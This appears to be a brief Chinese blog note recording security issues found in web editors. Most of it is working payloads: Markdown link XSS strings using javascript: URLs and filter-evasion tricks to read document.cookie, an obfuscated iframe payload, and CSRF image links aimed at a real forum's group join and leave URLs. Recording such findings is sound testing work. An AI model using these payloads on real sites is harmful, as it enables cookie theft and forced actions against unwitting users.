记录安全问题---2020年9月24号

时间：2020-09-24 16:05:10 阅读：33 评论：0 收藏：0 [点我收藏+]

1，xss攻击，

markdown编辑器的问题，

[chaitin](javascript://bbs.huaweicloud.com/%0Aconsole.log%28document.cookie%29)
[chaitin](javascript:https://bbs.huaweicloud.com/%0Aconsole.log%28document.cookie%29)
[chaitin](javascript:http://bbs.huaweicloud.com/%0Aconsole.log%28document.cookie%29)
[chaitin](javascript:http://bbs.huaweicloud.com/%0Aconsole.log%28alert%28123%29%29)
[chaitin](http://bbs.huaweicloud.com/%0Aconsole.log%28document.cookie%29)
[test](javascript://www.huaweicloud.com/%0Aalert%28%29)
[test](javascript://www.huaweicloud.com/%0Aalalertert%28%29)
[test](javascript://www.huaweicloud.com/%0Awindow[‘al‘+‘ert‘]%28%29)

富文本编辑器的问题，配合抓包工具注入js，

<iframe src="ja(vasc(ript:onerror=console.log;throw docum(ent.coo(kie" >

2，csrf攻击

采用一个退出联盟的url，作为markdown的一个图片，然后每次加载图片都会自动退出联盟，这是很可怕的

![ceshi](http://lgd.pm.comsenz-service.com/hero/forum.php?mod=group&action=out&fid=853)
![ceshi](http://lgd.pm.comsenz-service.com/hero/forum.php?mod=group&action=join&fid=853&inajax=1&ajaxdata=json)

=============

记录安全问题---2020年9月24号

原文：https://www.cnblogs.com/andy0816/p/13723113.html

踩

(0)

评论一句话评论（0）

分享档案

更多>

2021年09月23日 (328)
2021年09月24日 (313)
2021年09月17日 (191)
2021年09月15日 (369)
2021年09月16日 (411)
2021年09月13日 (439)
2021年09月11日 (398)
2021年09月12日 (393)
2021年09月10日 (160)
2021年09月08日 (222)